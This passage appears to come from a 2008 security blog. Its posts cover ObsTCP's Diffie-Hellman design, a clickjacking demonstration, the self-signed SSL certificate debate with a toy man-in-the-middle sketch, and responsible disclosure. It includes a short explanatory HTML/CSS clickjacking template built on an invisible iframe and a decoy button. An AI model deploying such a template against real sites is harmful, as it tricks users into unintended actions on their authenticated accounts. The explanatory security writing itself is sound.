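P = 0xFFFFFFFB  # small public prime modulus, illustration only
G = 5           # public generator

def dh_keypair():
    """Generate a (private, public) pair: public = G^private mod P."""
    private = secrets.randbelow(P - 2) + 1
    public = pow(G, private, P)
    return private, public

# The server publishes its public value (ObsTCP does this via DNS).
server_priv, server_pub = dh_keypair()

# The client generates its own pair and sends over its public value.
client_priv, client_pub = dh_keypair()

# Each side combines its own private value with the peer's public value.
server_shared = pow(client_pub, server_priv, P)
client_shared = pow(server_pub, client_priv, P)

assert server_shared == client_shared  # both ends now hold the same key
```

An eavesdropper who sees only `server_pub` and `client_pub` cannot feasibly recover the shared key, which is what makes passive sniffing unproductive.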
Overall, how does ObsTCP compare against the threat vectors previously listed in my "SSL encryption without authentication debate" post? We already mentioned that passive eavesdropping would be thwarted, as that's the purpose of ObsTCP to begin with. But what about a more active man-in-the-middle (MitM) attack? My cursory review of the ObsTCP documentation and design indicates that it does not directly mitigate that specific threat vector; however, it does make it harder for an attacker to pull off. This is because the server's public key is distributed via DNS, separate from the TCP connection. That means an attacker has to intercept both the DNS request and the TCP connection in order to successfully pull off a MitM attack. Further, the DNS records can be cached at various points around the Internet, making it even more difficult for the attacker to spoof a DNS response. The attacker would likely have to employ separate, specific DNS attacks (such as the recent Kaminsky brouhaha) just to inject the right info into DNS in order for the TCP intercept/MitM to work correctly. The amount of effort and coordination required is far greater than for a single TCP intercept/MitM attack by itself.
Overall the ObsTCP project is in alpha stages, but the idea is intriguing. It does seem to fill a need that is growing and becoming more vocalized (i.e. encryption without authentication). It will be interesting to see whether the project becomes adopted enough to start gaining public traction and attention. We figure it will be the usual circular catch-22 situation often encountered with new Internet technology: server admins forego deploying the technology because not enough clients support it, and clients forego implementing the technology because not enough servers support it. Oh well, it’s still a good idea.
- Jeff

Tuesday, October 7, 2008

Clickjacking Demystified

I've recently commented on the controversy surrounding the Clickjacking talk that was to be given by Jeremiah Grossman and Robert 'RSnake' Hansen at the OWASP USA 2008 conference, which was pulled at the last minute due to a request from Adobe. At the time, I discussed my concern that the best and the brightest would soon step forward to reveal the mystery before the vendors could beat them to the punch, and it appears that this has indeed transpired. Details have been leaking out over the past couple of weeks, and by borrowing from the work of HD Moore and Michal Zalewski, I've put together a demonstration of what is emerging as the consensus on what Jeremiah and Robert were going to talk about.


Clickjacking Demo


HD did most of the heavy lifting but I'll take this opportunity to break down what is happening here.

What is Clickjacking?
Clickjacking is a social engineering attack whereby a victim is tricked into clicking on one or more hidden links on a page. When the victim clicks on links of the attacker's choosing, they perform some action that they didn't intend, but which benefits the attacker. In the demo you're simply adding a Google News Alert for 'Zscaler' to your profile, but this same approach could be used for a variety of attacks, such as forcing a user to reset their password, transfer funds, post content, etc.

How Does the Demo Work?
The demonstration above has the following components:
  • IFRAME - While no data traverses between domains, the attacker convinces the victim that they are looking at content from one domain (e.g. Zscaler), while in reality the browser is interacting with another domain (e.g. Google). This is accomplished by opening the ultimate target in an IFRAME and obfuscating its content, while the visible content is layered on top and displayed on the main page itself.
  • Layering - In order to ensure that interaction (e.g. mouse clicks) affects the hidden target page, elements are layered on top of one another. In the demo, the 'Click Here' button has been given a z-index value of '-10'. This ensures that while the ultimate target may not be visible due to obfuscation (see below), mouse clicks will actually interact with the 'Create Alert' button on the Google News page.
  • Obfuscation - While the full Google News page has been rendered by the victim's browser, it is not visible as the opacity value of the iFRAME element containing the page has been set to '0'.
To summarize the demo, while it may appear that you are clicking on a blue 'Click Here' button, you are actually clicking on a hidden 'Create Alert' button on the Google News page. Assuming that you have already authenticated to Google within the same browser instance, that one single click will add a Google News alert for 'Zscaler' to your profile. The demonstration does not require JavaScript, which was highlighted by Jeremiah and Robert as a reason why this attack was particularly malicious. This particular demonstration required nothing more than HTML and CSS - something that virtually all browsers support.
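Stripped to its essentials, the technique described above can be sketched in a few lines of HTML and CSS. This is a hypothetical reconstruction, not the demo's actual source (the URL, element IDs, and pixel offsets are placeholders), but it shows all three components: the IFRAME, the layering, and the opacity-based obfuscation.

```html
<!-- Hypothetical clickjacking sketch; the target URL and offsets are made up. -->
<style>
  /* Obfuscation: the target page is fully rendered but invisible. */
  #target { position: absolute; top: 0; left: 0;
            width: 600px; height: 400px; opacity: 0; }
  /* Layering: the decoy button sits BELOW the invisible frame (z-index -10),
     positioned so the frame's real button lands directly over it. */
  #decoy  { position: absolute; top: 120px; left: 80px; z-index: -10; }
</style>
<iframe id="target" src="http://target-site.example/create-alert"></iframe>
<button id="decoy">Click Here</button>
<!-- The victim sees and aims for 'Click Here', but because the transparent
     IFRAME is stacked above the decoy, the click is received by the hidden
     button inside the framed page. -->
```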

I have no doubt that when the details are finally revealed, that Jeremiah and Robert will have a few more tricks up their sleeves to raise the bar on this issue to an even higher risk level but I'm confident that the basis of the attack is now public. It appears that Jeremiah will reveal full details of clickjacking during a keynote at the Hack in the Box conference in Malaysia on October 29th.

- michael

Friday, October 3, 2008

The ‘SSL Encryption without Authentication’ debate

Every so often I encounter a debate where an individual is making a case for the value of supporting/accepting self-signed SSL certificates in browsers. Basically their argument is “I do not care about authentication of SSL, I just want the encryption part…so why should I have to pay VeriSign or another commercial CA all that money for an SSL certificate that verifies my identity?” This question seems to be newly fueled by the fact that Firefox 3 now requires the user to go through a laborious 4-step process to allow the browser to connect to an SSL site utilizing a self-signed certificate.

The problem is: anyone who asks the above question is ignoring how SSL works and how SSL employs encryption in the first place. If you are trying to keep an evil person from learning your secrets, but you do not authenticate who you are talking to, you are basically overlooking that you may well be telling your secrets to the evil person directly! If you don’t authenticate the identity of someone, they are essentially an unidentified stranger to you. And the idea of wanting to keep your secrets from strangers (i.e. encryption) but also be willing to give your secrets to strangers (i.e. no authentication) is contradictory. If you have no idea of who you are talking to, then what value is the encryption really providing? How do you tell a complete stranger a secret in private and still expect the secret to remain safe from strangers?

Let’s look at how SSL tackles authentication via the use of certificates. A signed (i.e. authenticated) certificate is essentially a digital record that says “My name is Bob, and this big trusted company over here agrees with that statement.” The idea is that browsers trust a set of big trusted companies (Certificate Authorities such as VeriSign, Thawte, etc.), and that creates a trust chain: we trust the browser, the browser trusts the CA, the CA says this is Bob, so we trust it is Bob. On the other hand, a self-signed (i.e. non-authenticated) certificate is a digital record that says “My name is Bob, and you will just have to trust me that what I am saying is true.” It’s almost like the honor-system approach of everyone stating who they are; but how do we know if they are lying? Essentially, you don’t…because self-signed certificates can be created by anyone to say anything (that is the whole purpose of self-signed certificates). An evil attacker can trivially generate certificates that say “My name is Paypal, and you will just have to trust me,” “My name is eBay, and you will just have to trust me,” “My name is Bank of America, and you will just have to trust me,” etc. The only thing that prevents the attacker from deceiving you with these malicious self-signed certificates is your browser’s better judgment of not trusting these arbitrarily fabricated declarations of identity having no proof. Remember: security is about keeping you safe despite lies and deception; we need to ensure that a simple lie by an attacker won’t compromise the entire process. In this case, self-signed certificates offer a way for attackers to lie about their identity with impunity.

So let’s go back to the original premise of the question and look a bit more technically at what’s going on. The argument is the desire to have encryption without authentication. That means the sensitivity and secrecy of the data is still an issue/desire, otherwise, why bother with encryption? The primary threat vector mitigated by end-to-end encryption on a network is passive eavesdropping (a.k.a. network sniffing). But keep in mind that, in SSL, the encryption keys are dynamically negotiated by the two endpoints at the start of the connection (after authentication has concluded). Thus encryption by itself offers no security value if the passive eavesdropping attacker decides to switch to an active man-in-the-middle or interception attack (which is technically viable if they were already in a position to eavesdrop your network traffic to begin with); this just means you are now negotiating an encryption key with the attacker and directly sending them your data. SSL normally mitigates these attacks by the use of authentication, to ensure the endpoint you negotiate your encryption key with is indeed who they say they are. However if we allow self-signed certificates to be used and therefore overlook the authentication aspect, there is zero guarantee that the person you just negotiated an encryption tunnel with isn’t the person you were trying to secure your information from (via encryption) in the first place. True, it does require the attacker to switch from a passive attack to an active attack, but that is of little consequence if the attacker truly wants to compromise the data. And attackers are already playing very active roles in attacks today (setting up an entire phishing site and sending out phishing emails isn’t exactly a passive affair…).
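The active-interception scenario above is easy to make concrete. In this toy Python sketch (an illustrative Diffie-Hellman-style negotiation with deliberately tiny parameters, not any real SSL implementation), an attacker who can intercept the connection simply runs two key negotiations, one with each endpoint, and both sides happily "encrypt" straight to the attacker. Nothing in the math detects the swap; only authenticating the peer's identity would.

```python
import secrets

P = 0xFFFFFFFB  # toy public prime modulus (illustration only)
G = 5           # public generator

def keypair():
    """Generate a (private, public) pair for a toy DH exchange."""
    priv = secrets.randbelow(P - 2) + 1
    return priv, pow(G, priv, P)

client_priv, client_pub = keypair()
server_priv, server_pub = keypair()

# The attacker intercepts the connection and substitutes their own
# public value in both directions of the handshake.
mitm_priv, mitm_pub = keypair()

# The client thinks mitm_pub came from the server; the server thinks
# it came from the client. Each unknowingly keys with the attacker.
client_key = pow(mitm_pub, client_priv, P)
server_key = pow(mitm_pub, server_priv, P)

# The attacker derives both session keys and can decrypt, read,
# re-encrypt, and relay all traffic between the two endpoints.
mitm_client_key = pow(client_pub, mitm_priv, P)
mitm_server_key = pow(server_pub, mitm_priv, P)

assert client_key == mitm_client_key  # attacker reads client traffic
assert server_key == mitm_server_key  # attacker reads server traffic
```

Without some out-of-band proof of who supplied each public value, the endpoints have no way to notice that they never actually negotiated a key with each other.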

I have a hunch the real motive behind petitioning for self-signed certificate support is purely economic. Web site operators want to appear to conform to user expectations of security and privacy via the use of SSL (the whole “make sure the little lock icon appears in your browser before you send sensitive info” mantra), but without having to shell out cash for a real SSL certificate (if they just paid the money for a proper CA-signed certificate, this whole debate would be moot). It’s the façade of security without actually delivering on the promise. But those using self-signed SSL certificates in production, even prior to the newer crop of browsers handling them less favorably, are already doing a slight injustice to security as a whole, because they are forcing a user to essentially make a “Yes I know this is insecure, please proceed anyways” decision. Accepting self-signed certificates in older browsers is usually just a semi-scary dialog followed by a one-click override from the user…and apparently the protagonists of this debate believe this is (or was) acceptable for users to do. But isn’t that just exacerbating the phenomenon of users continually making bad security choices, by explicitly encouraging them to do so? We should not be encouraging users to bypass or override security protection mechanisms put there for their own good; what starts as an encouraged exception may eventually become an assumed norm (I’d like to make a Pavlov reference here, but I don’t want it seen as belittling the behavior or intelligence of users).

All of that said, I suppose there are some certain approaches that may offer a balanced compromise. If we look at SSH, we encounter the same basic problem: when the client first connects to the server, it doesn’t know if the server is actually the right server or not. So usually the client prompts the user with a small fingerprint of the server’s identity in order to verify that identity out-of-band. If the user instructs the client to proceed, the client caches the server’s identity fingerprint. From that point on, as long as the server’s identity fingerprint matches what is cached, life is good. If that identity fingerprint ever changes, then lots of security bells and whistles go off because something is afoot, such as a man-in-the-middle attack (or the server admin re-generated their identity information, which is not something done arbitrarily). Basically it reduces the “no-authentication” scenario down to only the very first, initial connection that the client makes to the server. An attacker would have one chance—and one chance only—to intercept that very first connection and supply impersonated credentials. But also keep in mind, if the attacker stops the interception ruse and allows the connections to proceed to the proper server, the client will immediately alert the user to something fishy because the server identity (as seen by the client) has changed. So an attacker can remain undetected if and only if they intercept that very first connection, and only for as long as they actively and continually intercept all future connections. That reduces the chance of successful attack to a very small window, and requires moderate effort on part of the attacker to remain undetected. Perhaps this approach could be adapted to browsers, where a self-signed certificate for a given site can be manually verified once (the first time), and then cached so that as long as the certificate doesn’t change, it can be assumed to be the same site. 
It is entirely a change to the client browser and how SSL certificates are validated; no SSL protocol or server-side changes are necessary.
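The SSH-style approach described above is often called "trust on first use," and it is simple to sketch. In this hypothetical Python example, the "fingerprint" is just a hash of the server's certificate bytes, and the cache is an in-memory dict standing in for a browser's persistent store; the function name and return values are made up for illustration.

```python
import hashlib

# Persistent cache of host -> certificate fingerprint; a browser
# would keep this on disk, like SSH's known_hosts file.
known_sites = {}

def check_certificate(host, cert_der):
    """Trust-on-first-use check, modeled on SSH host-key handling.

    Returns 'first-use' (prompt the user to verify the fingerprint
    out-of-band), 'ok' (matches the cached fingerprint), or
    'MISMATCH' (identity changed: possible man-in-the-middle).
    """
    fingerprint = hashlib.sha256(cert_der).hexdigest()
    cached = known_sites.get(host)
    if cached is None:
        known_sites[host] = fingerprint  # cache after user approval
        return "first-use"
    if cached == fingerprint:
        return "ok"
    return "MISMATCH"

# First connection: the user verifies the fingerprint manually, once.
status1 = check_certificate("example.com", b"self-signed cert bytes")
# Later connections with the same certificate pass silently.
status2 = check_certificate("example.com", b"self-signed cert bytes")
# A different certificate for the same host rings the alarm bells.
status3 = check_certificate("example.com", b"attacker cert bytes")
```

As described above, the attacker's only undetected window is that very first connection; any later substitution trips the mismatch case.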

But unless browsers were to enact such a change, the use of self-signed certificates in this day and age is a risky proposition. They are fine for testing purposes, but they should never be used in production with real users. An alternative to self-signed certificates is to create your own CA (you can use the free OpenSSL suite to do so) and use your CA to sign your server certificates; then encourage your users to install your CA certificate. This at least maintains the integrity and security value of the SSL protocol, and allows the users' browsers to function without any security warnings requiring user interaction. However, you must then guard your CA private keys thoroughly, as you have now become a trusted entity in the browser’s eyes; if your CA keys are stolen, attackers could generate arbitrary certificates signed by your CA. In other words, the attacker could create the equivalent of arbitrary self-signed certificates, but with you as the trusted signing authority; and since the users’ browsers now trust your CA, the browsers would inherently trust all of the attacker’s certificates.

Regardless of what you do, one thing is for certain: you do not want to be the weakest link in the security chain. SSL literally has a trust chain established by the use of authentication certificates, and trying to bypass authentication (and the associated trust chain) compromises all security (including encryption) offered by SSL. No one likes being identified as the weakest link, so save your company the PR trouble and just buy that SSL certificate from a proper CA. It’s what is best for everyone involved, and your wallet will recover.

- Jeff

Thursday, October 2, 2008

I Know Something You Don't Know

Responsible disclosure has produced an unwanted side effect. It's the 'I know something that you don't know' disclosure process. There seems to be an increasing trend in the security community to seek the attention provided by full disclosure but retain the praise given to those who stick to 'responsible disclosure'. I was reading an article today which discusses a purported universal TCP DoS attack discovered by Robert E. Lee and Jack Louis who are researchers with the Swedish security firm Outpost24. While they have disclosed the existence of the vulnerability, due to the widespread reach and implications of the issue, they've chosen to withhold details of the attack pending coordination with affected vendors. Based on what little I know of the attack and further insight provided by Robert Hansen, I have no doubt that I'll be thoroughly impressed once details of the attack are finally released. It does however make me uncomfortable to know that the clock is ticking and we can only sit on the sidelines to wait and see if motivated attackers are able to beat vendors to the punch and exploit this vulnerability before it can be patched.

Dan Kaminsky's DNS vulnerability taught us all a lesson that we should have already known: valuable information cannot be contained when others have the motivation and talent to obtain it. Any vulnerability that can be discovered by one researcher can be discovered by another. Stating that a vulnerability exists simply increases the value of the information - everyone wants it and the race is on. Some will strive to be first, to use the information for personal gain, while others will join the race simply for the challenge. Regardless, once you pull the cork, you can't put the genie back in the bottle.

There are times when we get stuck between a rock and a hard place. Take, for example, the situation that unfolded at the OWASP USA 2008 conference last week. Jeremiah Grossman and Robert 'RSnake' Hansen had planned to discuss a new browser attack known as clickjacking. However, at the request of Adobe, they agreed to alter the talk and not proceed with details, to allow Adobe additional time to address the vulnerability. Did they do the right thing? Only time will tell, but under the same conditions, I would have done the same thing. That said, should evidence of widespread clickjacking exploitation emerge, I would hope that Jeremiah and Robert will proceed with disclosing further details, despite the short-term potential to exacerbate the problem. While I'm fine with gun control overall, once the war breaks out, I'd appreciate a weapon to defend my family.

The 'responsible disclosure' debate will go on forever and we'll never agree because we all have different motivations. I can buy into situations where full and open disclosure is the lesser of two evils and I can even accept that there are times when remaining silent is necessary. However, in my opinion, yelling 'fire' without saying where just increases the risk that we'll all get trampled.

I'm not naive, I too work for a startup and recognize that the marketing value of such a report is golden. It's far more valuable than any targeted lead-gen that you could ever afford. However, the press isn't going anywhere. They'll still be waiting, just as hungry as ever when coordinated disclosure does finally occur. There is an argument that early publicity will help bring additional vendors to the table to participate in the coordinated disclosure process. While that may be true, groups like CERT or MITRE are well positioned to assist with coordination and can do a great job without the additional hassles of public involvement.

We want to have our cake and eat it too. There's one problem with that - once you take out the cake, the greedy kids want a piece too - and they aren't going to be polite and wait for it to be handed out.

- michael